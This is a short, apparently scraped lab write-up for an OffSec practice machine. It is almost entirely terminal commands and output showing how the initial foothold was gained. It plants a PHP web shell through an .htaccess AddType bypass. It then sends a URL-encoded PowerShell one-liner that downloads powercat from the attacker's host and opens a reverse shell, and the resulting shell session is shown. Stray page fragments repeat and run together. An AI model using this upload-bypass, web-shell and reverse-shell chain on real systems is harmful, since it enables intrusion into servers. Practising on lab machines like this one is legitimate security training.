Foothold
$ cp /var/lib/inetsim/http/fakefiles/sample.jpg .http://access.offsec/uploads/
Last updated
$ cp /var/lib/inetsim/http/fakefiles/sample.jpg .http://access.offsec/uploads/Last updated
$ vi shell.php$ echo 'AddType application/x-httpd-php .pwned' > .htaccess$ echo '<?php echo shell_exec($_GET["cmd"]); ?>' > cmd.pwned$ curl http://192.168.157.187/uploads/cmd.pwned?cmd=whoami
access\svc_apache$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...$ nc -lnvp 1337
listening on [any] 1337 ...$ curl 'http://192.168.157.187/uploads/cmd.pwned?cmd=powershell.exe%20-c%20%22IEX%28New-Object%20System.Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.45.169%2Fpowercat.ps1%27%29%3Bpowercat%20-c%20192.168.45.169%20-p%201337%20-e%20powershell%22'$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.157.187] 49939
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> whoami
whoami
access\svc_apache
PS C:\xampp\htdocs\uploads> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.157.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.157.254
PS C:\xampp\htdocs\uploads>